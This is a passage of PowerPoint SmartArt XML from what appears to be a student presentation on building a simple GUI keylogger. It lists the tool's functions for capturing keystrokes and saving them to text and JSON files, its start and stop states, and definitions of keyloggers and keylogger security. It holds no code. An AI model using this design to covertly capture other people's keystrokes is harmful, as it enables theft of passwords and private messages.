        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm rot="5400000">
          <a:off x="4168399" y="-363571"/>
          <a:ext cx="984966" cy="7200299"/>
        </a:xfrm>
        <a:prstGeom prst="round2Same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generate_text_log(key): Writes the accumulated keystrokes to a text file (key_log.txt).</a:t>
          </a:r>
        </a:p>
        <a:p>
          <a:pPr marL="57150" lvl="1" indent="-57150" algn="l" defTabSz="400050">
            <a:lnSpc>
              <a:spcPct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="15000"/>
            </a:spcAft>
            <a:buChar char="•"/>
          </a:pPr>
          <a:r>
            <a:rPr lang="en-US" sz="900" kern="1200" dirty="0"/>
            <a:t>generate_json_file(keys_used): Writes the logged keystrokes to a JSON file (key_log.json).</a:t>
          </a:r>
        </a:p>
        <a:p>
          <a:pPr marL="57150" lvl="1" indent="-57150" algn="l" defTabSz="400050">
            <a:lnSpc>
              <a:spcPct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="15000"/>
            </a:spcAft>
            <a:buChar char="•"/>
          </a:pPr>
          <a:r>
            <a:rPr lang="en-US" sz="900" kern="1200" dirty="0"/>
            <a:t>on_press(key): Handles key press events, updates the keys_used list, and calls generate_json_file.</a:t>
          </a:r>
        </a:p>
        <a:p>
          <a:pPr marL="57150" lvl="1" indent="-57150" algn="l" defTabSz="400050">
            <a:lnSpc>
              <a:spcPct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="15000"/>
            </a:spcAft>
            <a:buChar char="•"/>
          </a:pPr>
          <a:r>
            <a:rPr lang="en-US" sz="900" kern="1200" dirty="0"/>
            <a:t>on_release(key): Handles key release events, updates the keys_used list, and calls both generate_json_file and generate_text_log.</a:t>
          </a:r>
        </a:p>
        <a:p>
          <a:pPr marL="57150" lvl="1" indent="-57150" algn="l" defTabSz="400050">
            <a:lnSpc>
              <a:spcPct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="15000"/>
            </a:spcAft>
            <a:buChar char="•"/>
          </a:pPr>
          <a:r>
            <a:rPr lang="en-US" sz="900" kern="1200" dirty="0"/>
            <a:t>start_keylogger(): Initializes and starts the keylogger, updates the GUI to reflect the keylogger's running state.</a:t>
          </a:r>
        </a:p>
        <a:p>
          <a:pPr marL="57150" lvl="1" indent="-57150" algn="l" defTabSz="400050">
            <a:lnSpc>
              <a:spcPct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="15000"/>
            </a:spcAft>
            <a:buChar char="•"/>
          </a:pPr>
          <a:r>
            <a:rPr lang="en-US" sz="900" kern="1200" dirty="0"/>
            <a:t>stop_keylogger(): Stops the keylogger and updates the GUI to reflect the keylogger's stopped state.</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm rot="-5400000">
        <a:off x="1060733" y="2792177"/>
        <a:ext cx="7152217" cy="888802"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{1BC303FB-F10F-471F-81FA-439517E630C5}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm rot="5400000">
          <a:off x="-227300" y="4342607"/>
          <a:ext cx="1515333" cy="106073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4.GUI Components:</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm rot="-5400000">
        <a:off x="1" y="4645674"/>
        <a:ext cx="1060733" cy="454600"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{2F144BE0-EA0C-49B2-9259-D5CB43DC3579}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm rot="5400000">
          <a:off x="4168399" y="1007641"/>
          <a:ext cx="984966" cy="7200299"/>
        </a:xfrm>
        <a:prstGeom prst="round2Same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Label: Displays messages to the user about the keylogger’s state.</a:t>
          </a:r>
        </a:p>
        <a:p>
          <a:pPr marL="114300" lvl="1" indent="-114300" algn="l" defTabSz="622300">
            <a:lnSpc>
              <a:spcPct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="15000"/>
            </a:spcAft>
            <a:buChar char="•"/>
          </a:pPr>
          <a:r>
            <a:rPr lang="en-US" sz="1400" kern="1200" dirty="0"/>
            <a:t>Button: Two buttons to start and stop</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm rot="-5400000">
        <a:off x="1060733" y="4163389"/>
        <a:ext cx="7152217" cy="8888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F9E60-1795-4AF9-A355-39F2B992367F}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="79557" y="653932"/>
          <a:ext cx="2617220" cy="2617220"/>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72987A-5891-427B-8A96-0D62C22BFA14}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="181290" y="3500303"/>
          <a:ext cx="2229505" cy="575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C000"/>
              </a:solidFill>
            </a:rPr>
            <a:t>Initial State</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="198132" y="3517145"/>
        <a:ext cx="2195821" cy="541345"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{B447285D-FEB6-4765-947F-0AA70C7F9007}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm rot="21561844">
          <a:off x="3107583" y="1626736"/>
          <a:ext cx="410844" cy="628881"/>
        </a:xfrm>
        <a:prstGeom prst="rightArrow">
          <a:avLst>
            <a:gd name="adj1" fmla="val 60000"/>
            <a:gd name="adj2" fmla="val 50000"/>
          </a:avLst>
        </a:prstGeom>
        <a:pattFill prst="pct80">
          <a:fgClr>
            <a:schemeClr val="tx2">
              <a:lumMod val="75000"/>
            </a:schemeClr>
          </a:fgClr>
          <a:bgClr>
            <a:schemeClr val="bg1"/>
          </a:bgClr>
        </a:patt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107587" y="1753196"/>
        <a:ext cx="287591" cy="377329"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{11A0AAA9-22DF-40A6-AB32-44B2E094003C}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="3870545" y="611853"/>
          <a:ext cx="2617220" cy="2617220"/>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94521C-C32D-46A4-ABAC-9FFC33F4AD24}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="3962346" y="3424004"/>
          <a:ext cx="2453199" cy="552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C000"/>
              </a:solidFill>
            </a:rPr>
            <a:t>Starting State</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1800" kern="1200" dirty="0">
            <a:solidFill>
              <a:srgbClr val="FFC000"/>
            </a:solidFill>
          </a:endParaRPr>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="3978540" y="3440198"/>
        <a:ext cx="2420811" cy="520526"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{67468CDE-98BA-46A7-8D56-C3DC496AC62A}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm rot="21594810">
          <a:off x="6973428" y="1602947"/>
          <a:ext cx="485663" cy="628881"/>
        </a:xfrm>
        <a:prstGeom prst="rightArrow">
          <a:avLst>
            <a:gd name="adj1" fmla="val 60000"/>
            <a:gd name="adj2" fmla="val 50000"/>
          </a:avLst>
        </a:prstGeom>
        <a:pattFill prst="pct80">
          <a:fgClr>
            <a:schemeClr val="tx2">
              <a:lumMod val="75000"/>
            </a:schemeClr>
          </a:fgClr>
          <a:bgClr>
            <a:schemeClr val="bg1"/>
          </a:bgClr>
        </a:patt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973428" y="1728833"/>
        <a:ext cx="339964" cy="377329"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{E7806E98-F2ED-40B6-85DC-A0C0CAA5BCBA}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="7875374" y="605807"/>
          <a:ext cx="2617220" cy="2617220"/>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4AB813-89AB-4C50-977B-AC0AC4A60D3B}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="7892545" y="3429867"/>
          <a:ext cx="2617220" cy="5411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9933"/>
              </a:solidFill>
            </a:rPr>
            <a:t>Stopped State</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1800" kern="1200" dirty="0">
            <a:solidFill>
              <a:srgbClr val="FF9933"/>
            </a:solidFill>
          </a:endParaRPr>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="7908396" y="3445718"/>
        <a:ext cx="2585518" cy="509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49900-FAB9-4EF2-9487-C681327A1FC1}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm rot="10800000">
          <a:off x="1474634" y="193"/>
          <a:ext cx="5405120" cy="45277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9662" tIns="80010" rIns="149352" bIns="80010" numCol="1" spcCol="1270" anchor="ctr" anchorCtr="0">
          <a:noAutofit/>
        </a:bodyPr>
        <a:lstStyle/>
        <a:p>
          <a:pPr marL="0" lvl="0" indent="0" algn="l"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What is the keylogger and Security?</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="2100" kern="1200" dirty="0">
            <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
          </a:endParaRPr>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm rot="10800000">
        <a:off x="1587828" y="193"/>
        <a:ext cx="5291926" cy="452777"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{DB31281B-8963-4095-9558-87323C4E1722}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="1248245" y="193"/>
          <a:ext cx="452777" cy="452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9571481A-263A-4758-9A0B-6BB1A31D76CF}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm rot="10800000">
          <a:off x="1474634" y="566164"/>
          <a:ext cx="5405120" cy="45277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9662" tIns="80010" rIns="149352" bIns="80010" numCol="1" spcCol="1270" anchor="ctr" anchorCtr="0">
          <a:noAutofit/>
        </a:bodyPr>
        <a:lstStyle/>
        <a:p>
          <a:pPr marL="0" lvl="0" indent="0" algn="l"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Problem Statement</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="2100" kern="1200" dirty="0">
            <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
          </a:endParaRPr>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm rot="10800000">
        <a:off x="1587828" y="566164"/>
        <a:ext cx="5291926" cy="452777"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{463A46D2-8261-41F8-875F-7B641DC0BD02}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="1248245" y="566164"/>
          <a:ext cx="452777" cy="45277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EBA8F85-01C9-4B3B-8319-1EA4A1C8629E}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm rot="10800000">
          <a:off x="1509821" y="1132329"/>
          <a:ext cx="5405120" cy="45277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9662" tIns="80010" rIns="149352" bIns="80010" numCol="1" spcCol="1270" anchor="ctr" anchorCtr="0">
          <a:noAutofit/>
        </a:bodyPr>
        <a:lstStyle/>
        <a:p>
          <a:pPr marL="0" lvl="0" indent="0" algn="l"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Project Overview</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="2100" kern="1200" dirty="0">
            <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
            <a:cs typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
          </a:endParaRPr>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm rot="10800000">
        <a:off x="1623015" y="1132329"/>
        <a:ext cx="5291926" cy="452777"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{B46F464E-11E5-4A24-ACA0-6CF092DE9731}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="1248245" y="1132136"/>
          <a:ext cx="452777" cy="452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9484E-03CF-4ADA-BF58-8B461D3B18FE}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm rot="10800000">
          <a:off x="1474634" y="193"/>
          <a:ext cx="5405120" cy="45277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9662"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t>What are the end users?</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="2000" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm rot="10800000">
        <a:off x="1587828" y="193"/>
        <a:ext cx="5291926" cy="452777"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{8D70DBDD-FBC1-4EBF-8FAE-FE26E618545D}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="1248245" y="193"/>
          <a:ext cx="452777" cy="452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FA91578-10C0-4AC4-BD0C-B8AFE6950A9F}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm rot="10800000">
          <a:off x="1474634" y="566165"/>
          <a:ext cx="5405120" cy="45277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9662"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t>Solution and its Value Proposition</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="2000" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm rot="10800000">
        <a:off x="1587828" y="566165"/>
        <a:ext cx="5291926" cy="452777"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{D0F0E57E-4B72-43A9-B078-08F4A8993480}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="1248245" y="566165"/>
          <a:ext cx="452777" cy="45277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399FDF71-DBAD-4545-AF47-19429BB82785}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm rot="10800000">
          <a:off x="1474634" y="1132137"/>
          <a:ext cx="5405120" cy="45277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9662"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t>The Wow in our Solution</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="2000" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm rot="10800000">
        <a:off x="1587828" y="1132137"/>
        <a:ext cx="5291926" cy="452777"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{FD4207EE-16B7-4309-A727-015EA933B6CF}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="1248245" y="1132137"/>
          <a:ext cx="452777" cy="452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0E8BA-2388-4E89-B2D8-4E1140C11899}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm rot="10800000">
          <a:off x="1471765" y="121"/>
          <a:ext cx="5405120" cy="441301"/>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4602"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t>Modelling</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="2000" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm rot="10800000">
        <a:off x="1582090" y="121"/>
        <a:ext cx="5294795" cy="441301"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{6D62DEEE-1A12-454D-BAAF-4277CC7CDFEA}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="1251114" y="121"/>
          <a:ext cx="441301" cy="441301"/>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1AF989F-A241-4AFD-8887-9BE9CA42B35D}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm rot="10800000">
          <a:off x="1413754" y="551868"/>
          <a:ext cx="5547112" cy="441301"/>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4602"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t>Results</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="2000" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm rot="10800000">
        <a:off x="1524079" y="551868"/>
        <a:ext cx="5436787" cy="441301"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{FC627C7F-3253-46E8-AF61-52D0372573AA}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="1215616" y="551747"/>
          <a:ext cx="441301" cy="44130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5000" b="-25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E6C1-8CA3-40A4-8876-ED85376EBEBF}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="239784"/>
          <a:ext cx="6712268" cy="174783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 keylogger, short for keystroke logger, is a type of surveillance technology used to monitor and record each keystroke typed on a computer keyboard. Keyloggers can be either software-based or hardware-based and are often used for a variety of purposes, both legitimate and malicious.</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="85322" y="325106"/>
        <a:ext cx="6541624" cy="1577189"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{617564C6-F43D-4241-8926-AE2FA0BBD53A}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="0" y="2025027"/>
          <a:ext cx="6712268" cy="174783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Keylogger security refers to the practices and measures taken to protect against the malicious use of keyloggers. Keyloggers can pose significant security risks, as they capture keystrokes and can steal sensitive information such as passwords, credit card numbers, and personal messages. Therefore, implementing keylogger security involves various strategies to detect, prevent, and mitigate the impact of keyloggers.</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="85322" y="2110349"/>
        <a:ext cx="6541624" cy="15771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C3FD6-427B-4788-AD83-DCC156D9DA56}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="1423983" y="2991061"/>
          <a:ext cx="2180386" cy="0"/>
        </a:xfrm>
        <a:prstGeom prst="line">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119C92F-1E02-4857-9B53-F715C7CBA741}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="1423983" y="2230966"/>
          <a:ext cx="1867662" cy="0"/>
        </a:xfrm>
        <a:prstGeom prst="line">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61A007B-7493-43FD-B057-EBE1D7360BA6}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="1423983" y="1470871"/>
          <a:ext cx="2180386" cy="0"/>
        </a:xfrm>
        <a:prstGeom prst="line">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DF800C4-E24C-4DD9-B8A4-DF333F840A4C}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm rot="1084831">
          <a:off x="338133" y="1145116"/>
          <a:ext cx="2171700" cy="21717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2000" r="-42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F67353A2-478A-41D6-ADDA-0C1C9A45F685}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="729039" y="2298289"/>
          <a:ext cx="1389888" cy="716661"/>
        </a:xfrm>
        <a:prstGeom prst="rect">
          <a:avLst/>
        </a:prstGeom>
        <a:noFill/>
        <a:ln>
          <a:noFill/>
        </a:ln>
        <a:effectLst>
          <a:outerShdw blurRad="40000" dist="23000" dir="5400000" rotWithShape="0">
            <a:srgbClr val="000000">
              <a:alpha val="35000"/>
            </a:srgbClr>
          </a:outerShd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b" anchorCtr="0">
          <a:noAutofit/>
        </a:bodyPr>
        <a:lstStyle/>
        <a:p>
          <a:pPr marL="0" lvl="0" indent="0" algn="ctr" defTabSz="2266950">
            <a:lnSpc>
              <a:spcPct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="35000"/>
            </a:spcAft>
            <a:buNone/>
          </a:pPr>
          <a:endParaRPr lang="en-US" sz="5100" kern="1200" dirty="0"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="729039" y="2298289"/>
        <a:ext cx="1389888" cy="716661"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{37B0FEB4-FCDD-4EEA-85F3-4B3EE2BFA535}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="3278615" y="1145116"/>
          <a:ext cx="651510" cy="65151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1000" r="-41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5C24623D-FD43-42EA-9B01-ED1D20B0144D}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="3930125" y="1145116"/>
          <a:ext cx="75140" cy="651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marL="0" lvl="0" indent="0" algn="l" defTabSz="222250">
            <a:lnSpc>
              <a:spcPct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="35000"/>
            </a:spcAft>
            <a:buNone/>
          </a:pPr>
          <a:endParaRPr lang="en-US" sz="500" kern="1200"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="3930125" y="1145116"/>
        <a:ext cx="75140" cy="651510"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{C7CDB855-12DB-45D4-85D3-515656097D9D}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="2965890" y="1905211"/>
          <a:ext cx="651510" cy="65151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50000" r="-50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3FDA91FF-5F4B-4D84-8CE4-C489A85F97ED}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="3617400" y="1905211"/>
          <a:ext cx="106413" cy="651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marL="0" lvl="0" indent="0" algn="l" defTabSz="222250">
            <a:lnSpc>
              <a:spcPct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="35000"/>
            </a:spcAft>
            <a:buNone/>
          </a:pPr>
          <a:endParaRPr lang="en-US" sz="500" kern="1200"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="3617400" y="1905211"/>
        <a:ext cx="106413" cy="651510"/>
      </dsp:txXfrm>
    </dsp:sp>
    <dsp:sp modelId="{0CE3C8B3-4FAA-49A9-8AE0-30304AD7572E}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="3278615" y="2665306"/>
          <a:ext cx="651510" cy="65151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8000" r="-18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FDB8BE79-3DB0-4A7F-BB70-23EC9463146D}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="3930125" y="2665306"/>
          <a:ext cx="75140" cy="651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marL="0" lvl="0" indent="0" algn="l" defTabSz="222250">
            <a:lnSpc>
              <a:spcPct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="35000"/>
            </a:spcAft>
            <a:buNone/>
          </a:pPr>
          <a:endParaRPr lang="en-US" sz="500" kern="1200"/>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="3930125" y="2665306"/>
        <a:ext cx="75140" cy="6515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8F3EF-C433-46FA-8FA0-204811B1CB85}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="497204" y="0"/>
          <a:ext cx="5634990" cy="4038600"/>
        </a:xfrm>
        <a:prstGeom prst="rightArrow">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B8576A-26DF-4700-B485-F5AAD306401B}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="72509" y="1211580"/>
          <a:ext cx="6484381" cy="1615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To create a basic keylogger application with a graphical user interface that allows users to start and stop keylogging, and to log keystrokes in both text and JSON formats (or)  Develop a simple keylogger application with a graphical user interface (GUI) to start and stop keylogging. The application should log all keystrokes and save them in both text and JSON formats.</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="151368" y="1290439"/>
        <a:ext cx="6326663" cy="14577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64408-CF09-4222-A018-74CA13DACEC9}">
      <dsp:nvSpPr>
        <dsp:cNvPr id="0" name=""/>
        <dsp:cNvSpPr/>
      </dsp:nvSpPr>
      <dsp:spPr>
        <a:xfrm>
          <a:off x="847"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t" anchorCtr="1">
          <a:noAutofit/>
        </a:bodyPr>
        <a:lstStyle/>
        <a:p>
          <a:pPr marL="0" lvl="0" indent="0" algn="l" defTabSz="444500">
            <a:lnSpc>
              <a:spcPct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="35000"/>
            </a:spcAft>
            <a:buNone/>
          </a:pPr>
          <a:r>
            <a:rPr lang="en-US" sz="1000" b="1" i="0" kern="1200" baseline="0" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:rPr>
            <a:t>1.Capture Keystrokes:</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="1000" b="1" kern="1200" dirty="0">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
          </a:endParaRPr>
        </a:p>
        <a:p>
          <a:pPr marL="57150" lvl="1" indent="-57150" algn="l" defTabSz="355600">
            <a:lnSpc>
              <a:spcPct val="90000"/>
            </a:lnSpc>
            <a:spcBef>
              <a:spcPct val="0"/>
            </a:spcBef>
            <a:spcAft>
              <a:spcPct val="15000"/>
            </a:spcAft>
            <a:buChar char="•"/>
          </a:pPr>
          <a:r>
            <a:rPr lang="en-US" sz="800" b="0" i="0" kern="1200" baseline="0" dirty="0"/>
            <a:t>Detect and log each key press, hold, and release event.</a:t>
          </a:r>
          <a:endParaRPr lang="en-US" sz="800" kern="1200" dirty="0"/>
        </a:p>
        <a:p>
